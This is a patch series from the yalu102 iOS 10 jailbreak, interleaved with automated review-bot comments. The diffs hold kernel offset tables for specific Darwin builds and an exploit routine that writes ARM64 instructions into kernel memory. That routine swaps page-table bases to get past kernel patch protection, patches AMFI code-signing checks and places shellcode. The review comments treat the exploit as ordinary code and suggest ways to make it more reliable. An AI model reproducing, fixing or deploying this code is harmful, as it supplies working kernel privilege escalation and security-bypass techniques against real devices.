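Review bot: `struct mac_policy_ops` in the renamed header is a hand-copied mirror of the kernel's MAC policy operations table, and `exploit()` in jailbreak.m sizes its page loop with `sizeof(struct mac_policy_ops)`, yet nothing in the header records which xnu version the layout was taken from or that every member must stay `uint64_t` so the size matches a 64-bit function-pointer table. A header comment such as `/* Mirror of xnu's struct mac_policy_ops (security/mac_policy.h): one uint64_t per function pointer; layout must match the target kernel because sizeof() is used to walk the table. */` would make the invariant explicit, and a `_Static_assert` on the expected size, once that size is confirmed for the target kernel, would enforce it. The struct's remaining members lie outside the first hunk.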
diff --git a/yalu102/offsets.c b/yalu102/offsets.c
deleted file mode 100644
index 8d4fb23..0000000
--- a/yalu102/offsets.c
+++ /dev/null
@@ -1,103 +0,0 @@ -#include -#include -#include -#include - -#include "offsets.h" - -uint64_t allproc_offset; -uint64_t kernproc_offset; -uint64_t procoff; -uint64_t rootvnode_offset; - -void init_offsets() { - struct utsname u = { 0 }; - uname(&u); - - printf("sysname: %s\n", u.sysname); - printf("nodename: %s\n", u.nodename); - printf("release: %s\n", u.release); - printf("version: %s\n", u.version); - printf("machine: %s\n", u.machine); - - allproc_offset = 0x5a4148; - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; - - if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000") == 0) { - allproc_offset = 0x5a4148; - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000") == 0) { - allproc_offset = 0x5a8438; - procoff = 0x360; // iPhone 6s/iPad pro (?), 10.2 - rootvnode_offset = 0x5ae0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b8468; - procoff = 0x360; // iPhone 6, 10.2, credit to @Andywiik - rootvnode_offset = 0x5be0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001") == 0) { - allproc_offset = 0x5b8528; - procoff = 0x360; // iPad air 2 (wifi), 10.2, @nicogibbons (github) - rootvnode_offset = 0x5be0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X") == 0) { - allproc_offset = 0x5ac418; - procoff = 0x360; // iPhone 5s, 10.2, @jtv7 (github) - rootvnode_offset = 0x5b60b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010") == 0) { - allproc_offset = 0x5ec478; /* @Mila432 */ - procoff = 0x360; - 
rootvnode_offset = 0x5f20b8; /* @Mila432 */ - } else if (strstr(u.machine, "AppleTV5,3") && strstr(u.version, "root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X")) { //Using Ian's condition, not having my AppleTV nearby - allproc_offset = 0x5b8168; - procoff = 0x360; // tvOS 10.0.1 (14U71) @onchehuh (github) - rootvnode_offset = 0x5ba0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X") == 0){ - allproc_offset = 0x5a4128; - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010") == 0) { - allproc_offset = 0x5ec178; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5f20b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001") == 0) { - allproc_offset = 0x5b4228; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5ba0b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b4168; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5ba0b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000") == 0) { - allproc_offset = 0x5a4148; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X") == 0) { - allproc_offset = 0x5a4128; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010") == 0) { - allproc_offset = 0x5ec178; /* 
@Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5f20b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001") == 0) { - allproc_offset = 0x5b0228; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5b60b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b0168; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5b60b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000") == 0) { - allproc_offset = 0x5a4148; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X") == 0) { - allproc_offset = 0x5a4128; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; /* @Mila432 */ - } else { - printf("missing offset, prob crashing\n"); - } - -} diff --git a/yalu102/offsets.h b/yalu102/offsets.h deleted file mode 100644 index 4e6e8d3..0000000 --- a/yalu102/offsets.h +++ /dev/null 
@@ -1,37 +0,0 @@
-#ifndef offsets_h
-#define offsets_h
-
-#import
-
-// offsets from the main kernel 0xfeedfacf
-extern uint64_t allproc_offset;
-extern uint64_t kernproc_offset;
-
-// offsets in struct proc
-extern uint64_t struct_proc_p_pid_offset;
-extern uint64_t struct_proc_task_offset;
-extern uint64_t struct_proc_p_uthlist_offset;
-extern uint64_t struct_proc_p_ucred_offset;
-extern uint64_t struct_proc_p_comm_offset;
-
-// offsets in struct kauth_cred
-extern uint64_t struct_kauth_cred_cr_ref_offset;
-
-// offsets in struct uthread
-extern uint64_t struct_uthread_uu_ucred_offset;
-extern uint64_t struct_uthread_uu_list_offset;
-
-// offsets in struct task
-extern uint64_t struct_task_ref_count_offset;
-extern uint64_t struct_task_itk_space_offset;
-
-// offsets in struct ipc_space
-extern uint64_t struct_ipc_space_is_table_offset;
-
-// offsets in struct ipc_port
-extern uint64_t struct_ipc_port_ip_kobject_offset;
-
-void init_offsets();
-extern uint64_t rootvnode_offset;
-
-#endif
diff --git a/yalu102/patchfinder64.h b/yalu102/patchfinder64.h
index a6909af..23edd52 100644
--- a/yalu102/patchfinder64.h
+++ b/yalu102/patchfinder64.h
@@ -5,30 +5,29 @@ // Copyright © 2016 qwertyoruiop. All rights reserved. // -#ifndef patchfinder64_h -#define patchfinder64_h +#pragma once #import -extern uint64_t text_exec_base; -extern uint64_t text_exec_size; +extern uint64_t text_exec_base; +extern uint64_t text_exec_size; -extern uint64_t prelink_exec_base; -extern uint64_t prelink_exec_size; +extern uint64_t prelink_exec_base; +extern uint64_t prelink_exec_size; extern uint64_t whole_base; extern uint64_t whole_size; extern uint8_t* whole_dump; extern uint64_t find_register_value(uint32_t* opcodes, uint64_t offset, uint64_t opcode_base, uint8_t reg); extern uint64_t find_reference(uint32_t* opcodes, size_t opcode_size, uint64_t opcode_base, uint64_t target); + enum Search { SearchTextExec, SearchPrelinkExec }; -extern char uref; -extern uint64_t get_data_for_mode(uint64_t offset, enum Search mode); - +extern char uref; +uint64_t get_data_for_mode(uint64_t offset, enum Search mode); void set_text_exec(uint64_t text_exec_base_,uint64_t text_exec_size_); void set_prelink_exec(uint64_t prelink_exec_base_, uint64_t prelink_exec_size_); 
@@ -48,28 +47,3 @@ uint64_t find_ret_non0();
 uint64_t find_ret_0();
 uint64_t find_amfiret();
 uint64_t find_sbops();
-#define CS_VALID 0x0000001 /* dynamically valid */
-#define CS_ADHOC 0x0000002 /* ad hoc signed */
-#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */
-#define CS_INSTALLER 0x0000008 /* has installer entitlement */
-
-#define CS_HARD 0x0000100 /* don't load invalid pages */
-#define CS_KILL 0x0000200 /* kill process if it becomes invalid */
-#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */
-#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */
-#define CS_ENFORCEMENT 0x0001000 /* require enforcement */
-#define CS_REQUIRE_LV 0x0002000 /* require library validation */
-#define CS_ENTITLEMENTS_VALIDATED 0x0004000
-
-#define CS_ALLOWED_MACHO 0x00ffffe
-
-#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */
-#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */
-#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */
-#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */
-
-#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */
-#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */
-#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */
-#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */
-#endif /* patchfinder64_h */
From ac5917ccc0b385e2080a3a813023d93c2dddaa7d Mon Sep 17 00:00:00 2001
From: qwertyoruiop
Date: Sun, 29 Jan 2017 03:03:01 +0100
Subject: [PATCH 10/34] early 4k support
---
 yalu102/jailbreak.m | 26 ++++++++++----------------
 yalu102/pte_stuff.h | 10 ++++++++--
 2 files changed, 18 insertions(+), 18 deletions(-)
diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m
index 85f0ac9..30b2cf0 100644
--- a/yalu102/jailbreak.m
+++ b/yalu102/jailbreak.m
@@ -255,8 +255,11 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) uint64_t pmap_store = find_kernel_pmap(); NSLog(@"pmap: %llx", pmap_store); - level1_table = ReadAnywhere64(ReadAnywhere64(find_kernel_pmap())); + level1_table = ReadAnywhere64(ReadAnywhere64(pmap_store)); + + + uint64_t shellcode = physalloc(0x4000); /* @@ -355,7 +358,6 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) isvad 0 == 0x4000 */ - uint64_t level0_pte = physalloc(isvad == 0 ? 0x4000 : 0x1000); uint64_t ttbr0_real = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler + idx*4 - gadget_base + 24, text_exec_base, 1); @@ -367,6 +369,8 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) copyout(level0_pte, bbuf, isvad == 0 ? 0x4000 : 0x1000); uint64_t physp = findphys_real(level0_pte); + NSLog(@"%llx - %llx", physp, level0_pte); + WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30 @@ -410,12 +414,6 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) } mach_vm_protect(tfp0, shc, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE); - - uint64_t fake1 = physalloc(0x4000); - copyin(bbuf, level0_pte, 0x4000); - copyout(fake1, bbuf, 0x4000); - uint64_t fake1_p = findphys_real(fake1); - vm_address_t kppsh = 0; mach_vm_allocate(tfp0, &kppsh, 0x4000, VM_FLAGS_ANYWHERE); @@ -431,7 +429,7 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) WriteAnywhere32(kppsh+n, 0xd5182021); n+=4; // msr TTBR1_EL1, x1 WriteAnywhere32(kppsh+n, 0x10ffffe0); n+=4; // adr x0, #-4 WriteAnywhere32(kppsh+n, 0xd503201f); n+=4; // nop - WriteAnywhere32(kppsh+n, 0xd508873e); n+=4; // tlbi vae1, x30 + WriteAnywhere32(kppsh+n, isvad ? 0xd508871f : 0xd508873e); n+=4; // tlbi vae1, x30 WriteAnywhere32(kppsh+n, 0xd5033fdf); n+=4; // isb WriteAnywhere32(kppsh+n, 0xd65f03c0); n+=4; // ret WriteAnywhere64(kppsh+n, ReadAnywhere64(ttbr0_real)); n+=8; 
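Review bot: `uint64_t shellcode = physalloc(0x4000);` is added in the -255 hunk, but no hunk on this page reads `shellcode`, while the same commit removes the similar `fake1` allocation at -410; if it is a leftover it should go, and if it is consumed further down it should probably follow the page-size selection this commit introduces for `level0_pte` (`isvad == 0 ? 0x4000 : 0x1000`) rather than a fixed 16K. The two blank lines added with it are noise. `exploit` starts and ends outside these hunks.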
@@ -490,10 +488,10 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) TTE_SET(tte, TTE_BLOCK_ATTR_PXN_MASK, 0);\ WriteAnywhere64(tte_addr, tte);\ NSLog(@"level %llx - %llx", tte_addr, TTE_GET(tte, TTE_PHYS_VALUE_MASK));\ - }, level1_table, 2); + }, level1_table, isvad ? 1 : 2); level1_table = physp - gPhysBase + gVirtBase; - WriteAnywhere64(ReadAnywhere64(find_kernel_pmap()), level1_table); + WriteAnywhere64(ReadAnywhere64(pmap_store), level1_table); #define NewPointer(origptr) (((origptr) & PMK) | findphys_real(origptr) - gPhysBase + gVirtBase) @@ -505,8 +503,7 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) WriteAnywhere32(NewPointer(shtramp), 0x58000041); WriteAnywhere32(NewPointer(shtramp)+4, 0xd61f0020); WriteAnywhere64(NewPointer(shtramp)+8, kppsh); - - + uint64_t lwvm_write = find_lwvm_mapio_patch(); uint64_t lwvm_value = find_lwvm_mapio_newj(); RemapPage(lwvm_write); @@ -661,9 +658,6 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) WriteAnywhere64(remap + 8, shc+0x200); /* amfi shellcode */ } - copyin(bbuf, level0_pte, PSZ); - copyout(fake1, bbuf, PSZ); - for (int i = 0; i < z; i++) { WriteAnywhere64(plist[i], physcode + 0x100); diff --git a/yalu102/pte_stuff.h b/yalu102/pte_stuff.h index 6951402..0183608 100644 --- a/yalu102/pte_stuff.h +++ b/yalu102/pte_stuff.h @@ -87,10 +87,16 @@ void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_ vm_address_t tteaddr = 0; + + if (sz == 4096) { VMA_4K target_addr; target_addr.vmaddr = vmaddr; - + NSLog(@"level %x", target_addr.vm_info.level1_index); + if (level == 1) { + target_addr.vm_info.level1_index -= 0x1c0; + } + switch (level) { case 0: tteaddr = table + TTE_INDEX(target_addr, level0); @@ -156,7 +162,7 @@ uint64_t findphys_real(uint64_t virtaddr) { if (addr == 3) {\ physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); } - }, level1_table, 2); + }, level1_table, isvad ? 1 : 2); return physvar; 
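Review bot: `target_addr.vm_info.level1_index -= 0x1c0;` in the pte_stuff.h hunk at -87 is an unexplained constant applied only when `level == 1` on 4K pages, and the matching top-level choice `isvad ? 1 : 2` is now duplicated between jailbreak.m (-490) and `findphys_real` (-156). A comment on the subtraction, e.g. `// 4K layout: the level-1 index is rebased by 0x1c0 -- TODO record how this was derived`, plus a single macro such as `#define TOP_TABLE_LEVEL (isvad ? 1 : 2)` used by both callers (assuming `isvad` is visible to both, as its use inside `findphys_real` suggests) would keep the two from diverging. `pagestuff_64` and `exploit` both start outside these hunks.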
From 1b6d90541ba736dc816f298e3d718f5c7377c7c9 Mon Sep 17 00:00:00 2001 From: qwertyoruiop Date: Sun, 29 Jan 2017 04:04:08 +0100 Subject: [PATCH 11/34] ew logs --- yalu102/jailbreak.m | 8 ++------ yalu102/pte_stuff.h | 2 +- 2 files changed, 3 insertions(+), 7 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 30b2cf0..e6844ef 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -369,7 +369,6 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) copyout(level0_pte, bbuf, isvad == 0 ? 0x4000 : 0x1000); uint64_t physp = findphys_real(level0_pte); - NSLog(@"%llx - %llx", physp, level0_pte); WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 @@ -429,7 +428,7 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) WriteAnywhere32(kppsh+n, 0xd5182021); n+=4; // msr TTBR1_EL1, x1 WriteAnywhere32(kppsh+n, 0x10ffffe0); n+=4; // adr x0, #-4 WriteAnywhere32(kppsh+n, 0xd503201f); n+=4; // nop - WriteAnywhere32(kppsh+n, isvad ? 0xd508871f : 0xd508873e); n+=4; // tlbi vae1, x30 + WriteAnywhere32(kppsh+n, isvad ? 0xd508871f : 0xd508873e); n+=4; // tlbi vmalle1 (4k) / tlbi vae1, x30 (16k) WriteAnywhere32(kppsh+n, 0xd5033fdf); n+=4; // isb WriteAnywhere32(kppsh+n, 0xd65f03c0); n+=4; // ret WriteAnywhere64(kppsh+n, ReadAnywhere64(ttbr0_real)); n+=8; @@ -644,13 +643,10 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) { uint64_t point = find_amfiret()-0x18; - NSLog(@"%x %x", ReadAnywhere64(point), ReadAnywhere64(NewPointer(point))); + RemapPage((point & (~PMK))); uint64_t remap = NewPointer(point); - NSLog(@"%llx %llx", (point), (remap)); - NSLog(@"%x %x", ReadAnywhere32(point), ReadAnywhere32(remap)); - assert(ReadAnywhere32(point) == ReadAnywhere32(remap)); WriteAnywhere32(remap, 0x58000041); diff --git a/yalu102/pte_stuff.h b/yalu102/pte_stuff.h index 0183608..965b0bc 100644 --- a/yalu102/pte_stuff.h +++ b/yalu102/pte_stuff.h 
@@ -92,7 +92,7 @@ void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_ if (sz == 4096) { VMA_4K target_addr; target_addr.vmaddr = vmaddr; - NSLog(@"level %x", target_addr.vm_info.level1_index); + if (level == 1) { target_addr.vm_info.level1_index -= 0x1c0; } From c8b860240b9f3b8a1073cd0e2994004ab2eae089 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 16:23:48 +0100 Subject: [PATCH 12/34] Port over Mila432's offset changes --- yalu102/Kernels.plist | 251 +++++++++++------------------------------- 1 file changed, 65 insertions(+), 186 deletions(-) diff --git a/yalu102/Kernels.plist b/yalu102/Kernels.plist index 0e8413f..65b4300 100644 --- a/yalu102/Kernels.plist +++ b/yalu102/Kernels.plist 
@@ -2,259 +2,138 @@ - - Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010 + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001 allproc - 0x5EC178 - proc - 0x360 + 0x5b8528 rootvnode - 0x5F20B8 + 0x5be0b8 - - - Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001 + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000 allproc - 0x5B0228 - proc - 0x360 + 0x5b8468 rootvnode - 0x5B60B8 + 0x5be0b8 - - - Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000 + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000 allproc - 0x5b0168 - proc - 0x360 + 0x5a8438 rootvnode - 0x5b60b8 + 0x5ae0b8 - - - Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000 + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X allproc - 0x5a4148 - proc - 0x360 + 0x5ac418 rootvnode - 0x5aa0b8 + 0x5b20b8 - - - Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010 allproc - 0x5a4128 - proc - 0x360 + 0x5ec478 rootvnode - 0x5aa0b8 + 0x5f20b8 - - - Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X + Darwin Kernel Version 16.3.0: Mon Dec 19 19:56:48 PST 2016; root:xnu-3789.43.2~1/RELEASE_ARM64_T7000 allproc - 0x5a4128 - proc - 0x360 + 0x5b8468 rootvnode - 0x5aa0b8 + 0x5be0b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000 + Darwin Kernel Version 16.3.0: Tue Nov 29 20:25:47 PST 2016; root:xnu-3789.33.1~1/RELEASE_ARM64_T7000 allproc - 0x5A4148 - proc - 0x360 + 0x5b8468 
rootvnode - 0x5AA0B8 + - - - Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000 + Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000 allproc - 0x5A8438 - proc - 0x360 + 0x5b4168 rootvnode - 0x5AE0B8 + 0x5ba0b8 - - - Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000 + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010 allproc - 0x5B8468 - proc - 0x360 + 0x5ec178 rootvnode - 0x5BE0b8 + 0x5f20b8 - - - Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001 allproc - 0x5AC418 - proc - 0x360 + 0x5b4228 rootvnode - 0x5B20B8 + 0x5ba0b8 - - - Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010 + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000 allproc - 0x5EC478 - proc - 0x360 + 0x5b4168 rootvnode - 0x5F20B8 + 0x5ba0b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000 + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000 + + allproc + 0x5a4148 + rootvnode + 0x5aa0b8 + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X allproc - 0x5B8168 - proc - 0x360 + 0x5a4128 rootvnode - 0x5BA0B8 + 0x5aa0b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010 + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010 allproc - 0x5EC178 - proc - 0x360 + 0x5ec178 rootvnode - 0x5F20B8 + 0x5f20b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; 
root:xnu-3789.22.3~1/RELEASE_ARM64_T7001 + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001 allproc - 0x5B4228 - proc - 0x360 + 0x5b0228 rootvnode - 0x5BA0B8 + 0x5b60b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000 + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000 allproc - 0x5B4168 - proc - 0x360 + 0x5b0168 rootvnode - 0x5BA0B8 + 0x5b60b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000 + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000 allproc - 0x5A4148 - proc - 0x360 + 0x5a4148 rootvnode - 0x5AA0B8 + 0x5aa0b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X allproc - 0x5A4128 - proc - 0x360 + 0x5a4128 rootvnode - 0x5AA0B8 + 0x5aa0b8 + + Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X + + allproc + 0x5a4128 + rootvnode + 0x5aa0b8 From 6d9d697b53a926c97e5a0d9fd580d7fabc8a7a85 Mon Sep 17 00:00:00 2001 
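Review bot: The entry for `xnu-3789.33.1~1/RELEASE_ARM64_T7000` appears to be added with an empty `rootvnode` value (the `+` line following its `rootvnode` key carries no offset, unlike every other entry), so whatever reads this table would get zero or a parse failure for that kernel; either fill in the verified offset or leave the entry out so the consumer refuses to proceed instead of using a bogus address. The commit also drops the `proc` key from every entry, which is fine only if the code reading this plist was updated in the same series; that reader is not in this view, so it should be confirmed. The plist markup is stripped in this rendering, so the empty value is inferred from the diff text.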
From: Oliver Kuckertz Date: Sun, 29 Jan 2017 16:31:38 +0100 Subject: [PATCH 13/34] Factor tfp0 exploit out into separate file --- yalu102.xcodeproj/project.pbxproj | 14 ++ yalu102/ViewController.m | 371 +++--------------------------- yalu102/YAExploitTFP0.h | 20 ++ yalu102/YAExploitTFP0.m | 339 +++++++++++++++++++++++++++ yalu102/YAKernelOffsets.h | 20 ++ yalu102/YAKernelOffsets.m | 43 ++++ yalu102/jailbreak.h | 8 +- yalu102/jailbreak.m | 24 +- yalu102/mach_vm.h | 9 + 9 files changed, 492 insertions(+), 356 deletions(-) create mode 100644 yalu102/YAExploitTFP0.h create mode 100644 yalu102/YAExploitTFP0.m create mode 100644 yalu102/YAKernelOffsets.h create mode 100644 yalu102/YAKernelOffsets.m create mode 100644 yalu102/mach_vm.h diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index bacd1e8..4c3622e 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -9,6 +9,8 @@ /* Begin PBXBuildFile section */ A70DFA9E1E3D332500769FE9 /* include in Resources */ = {isa = PBXBuildFile; fileRef = A70DFA9D1E3D332500769FE9 /* include */; }; A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */ = {isa = PBXBuildFile; fileRef = A70DFAA01E3D35AC00769FE9 /* Kernels.plist */; }; + A70DFAAB1E3E35C200769FE9 /* YAKernelOffsets.m in Sources */ = {isa = PBXBuildFile; fileRef = A70DFAAA1E3E35C200769FE9 /* YAKernelOffsets.m */; }; + A70DFAAF1E3E3B8900769FE9 /* YAExploitTFP0.m in Sources */ = {isa = PBXBuildFile; fileRef = A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */; }; A72023721E3CFC2B00FADBFF /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = A72023711E3CFBCA00FADBFF /* IOKit.framework */; }; EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = 